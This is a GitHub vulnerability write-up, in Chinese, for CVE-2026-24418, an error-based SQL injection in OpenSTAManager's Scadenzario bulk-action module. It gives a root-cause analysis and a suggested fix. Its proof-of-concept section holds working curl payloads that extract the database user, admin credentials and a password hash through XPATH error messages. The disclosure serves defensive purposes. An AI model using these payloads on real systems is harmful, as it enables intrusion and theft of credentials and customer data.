lukasz-rybak/CVE-2026-24418
GitHub: lukasz-rybak/CVE-2026-24418
这是一个针对 OpenSTAManager Scadenzario 模块 SQL 注入漏洞的分析与利用演示仓库。
Stars: 0 | Forks: 0
# CVE-2026-24418: OpenSTAManager Scadenzario 批量操作模块存在 SQL 注入漏洞
## 概述
| 字段 | 详情 |
|---|---|
| **CVE ID** | [CVE-2026-24418](https://nvd.nist.gov/vuln/detail/CVE-2026-24418) |
| **严重程度** | HIGH |
| **公告** | [查看公告](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq) |
| **发现者** | [Lukasz Rybak](https://github.com/lukasz-rybak) |
## 受影响产品
- **devcode-it/openstamanager** (版本: <= 2.9.8)
## CWE 分类
- CWE-89: SQL 命令中使用的特殊元素未正确中和 ('SQL 注入')
## 详情
### 摘要
OpenSTAManager v2.9.8 的 Scadenzario (付款计划) 批量操作模块中存在严重的基于错误的 SQL 注入漏洞,允许经过身份验证的攻击者通过 XML 错误消息提取完整的数据库内容,包括用户凭据、客户个人身份信息 (PII) 和财务记录。
**状态:** ✅ 已在真实实例 (v2.9.8) 上确认并测试
**易受攻击的参数:** `id_records[]` (POST 数组)
**受影响的端点:** `/actions.php?id_module=18` (Scadenzario 模块)
**攻击类型:** 基于错误的 SQL 注入 (IN 子句)
### 详情
OpenSTAManager v2.9.8 在 Scadenzario (付款计划) 模块的批量操作处理程序中包含一个严重的基于错误的 SQL 注入漏洞。应用程序未能验证 `id_records` 数组的元素在使用 SQL IN() 子句之前是否为整数,从而允许攻击者注入任意 SQL 命令并通过 XPATH 错误消息提取敏感数据。
**漏洞链:**
1. **入口点:** `/actions.php` (Lines 503-506)
$id_records = post('id_records');
$id_records = is_array($id_records) ? $id_records : explode(';', $id_records);
$id_records = array_clean($id_records);
$id_records = array_unique($id_records);
`array_clean()` 函数仅移除空值 - 它不验证类型。
2. **易受攻击的函数:** `/lib/util.php` (Lines 54-60)
function array_clean($array)
{
if (!empty($array)) {
return array_unique(array_values(array_filter($array, fn ($value) => !empty($value))));
}
}
**影响:** 该函数过滤掉空值,但接受任何非空值,包括 SQL 注入 payload。
3. **SQL 注入点:** `/modules/scadenzario/bulk.php` (Line 88) **主要漏洞**
$scadenze = $database->FetchArray('SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN ('.implode(',', $id_records).') AND pagato < da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento');
**影响:** 来自 `$id_records` 的数组元素使用 `implode()` 直接拼接,没有类型验证或 `prepare()`,从而实现了完整的 SQL 注入。
**根本原因分析:**
存在该漏洞的原因是:
1. `post('id_records')` 返回用户控制的数组
2. `array_clean()` 仅移除空值,不移除非整数值
3. `implode(',', $id_records)` 将数组元素直接拼接进 SQL 中
4. 没有验证确保数组元素是整数
5. 攻击者可以通过提供以下内容注入 SQL: `id_records[]=1&id_records[]=(恶意 SQL)#`
**受影响的代码路径:**
```
POST /actions.php?id_module=18
↓
actions.php:503 - $id_records = post('id_records')
↓
actions.php:505 - $id_records = array_clean($id_records) [NO TYPE VALIDATION]
↓
actions.php:509 - include 'modules/scadenzario/bulk.php'
↓
bulk.php:88 - WHERE id IN ('.implode(',', $id_records).') [INJECTION POINT]
```
### 概念验证
**步骤 1: 登录**
```
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
-d 'username=admin&password=admin'
```
**步骤 2: 验证漏洞 (基于错误的 SQL 注入)**
**测试 1: 提取数据库用户和版本**
```
curl -b cookies.txt \
-d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(USER(),' | ',VERSION()))))%23" \
"http://localhost:8081/actions.php?id_module=18"
```
**响应 (攻击者可见的错误消息):**
```
XPATH syntax error: '~osm@localhost | 8.0.40-0ubuntu0.22.04.1'
```
**测试 2: 提取管理员凭据**
```
curl -b cookies.txt \
-d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(username,':',email) FROM zz_users LIMIT 1)))%23" \
"http://localhost:8081/actions.php?id_module=18"
```
**响应:**
```
XPATH syntax error: '~admin:admin@osm.local'
```
**测试 3: 提取密码哈希 (第 1 部分 - 前 31 个字符)**
```
curl -b cookies.txt \
-d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTRING(password,1,31) FROM zz_users LIMIT 1)))%23" \
"http://localhost:8081/actions.php?id_module=18"
```
**响应:**
```
XPATH syntax error: '~$2y$10$UUPECY1DhQXm2pGEq/UNAeMd'
```
**测试 4: 提取密码哈希 (第 2 部分 - 第 32-60 个字符)**
```
curl -b cookies.txt \
-d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTRING(password,32,60) FROM zz_users LIMIT 1)))%23" \
"http://localhost:8081/actions.php?id_module=18"
```
**响应:**
```
XPATH syntax error: '~SoqiRNefN.G9fYMVnCRcvmG0BnwTK'
```
**合并后的密码哈希:**
```
$2y$10$UUPECY1DhQXm2pGEq/UNAeMdSoqiRNefN.G9fYMVnCRcvmG0BnwTK
```
### 影响
**所有有权访问 Scadenzario (付款计划) 模块批量操作的已认证用户。**
**建议修复:**
**主要修复 - 类型验证:**
文件: `/modules/scadenzario/bulk.php`
**修复前 (易受攻击 - Line 88):**
```
$scadenze = $database->FetchArray('SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN ('.implode(',', $id_records).') AND pagato < da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento');
```
**修复后 (已修复):**
```
// Validate that all array elements are integers
$id_records = array_map('intval', $id_records);
$id_records = array_filter($id_records, fn($id) => $id > 0); // Remove zero/negative IDs
$scadenze = $database->FetchArray('SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN ('.implode(',', $id_records).') AND pagato < da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento');
```
### 致谢
由 Łukasz Rybak 发现
## 参考
- https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq
- https://nvd.nist.gov/vuln/detail/CVE-2026-24418
- https://github.com/advisories/GHSA-4xwv-49c8-fvhq
## 免责声明
此 CVE 是按照协调漏洞披露实践负责任地披露的。此处提供的信息仅用于教育和防御目的。标签:CISA项目, CVE-2026-24418, CWE-89, OpenSTAManager, OpenVAS, Payment Schedule, PHP, Scadenzario, Web安全, XML错误, 多线程, 批量操作, 数据提取, 漏洞分析, 漏洞复现, 演示模式, 网络安全, 蓝队分析, 路径探测, 身份验证绕过, 错误注入, 隐私保护, 高危漏洞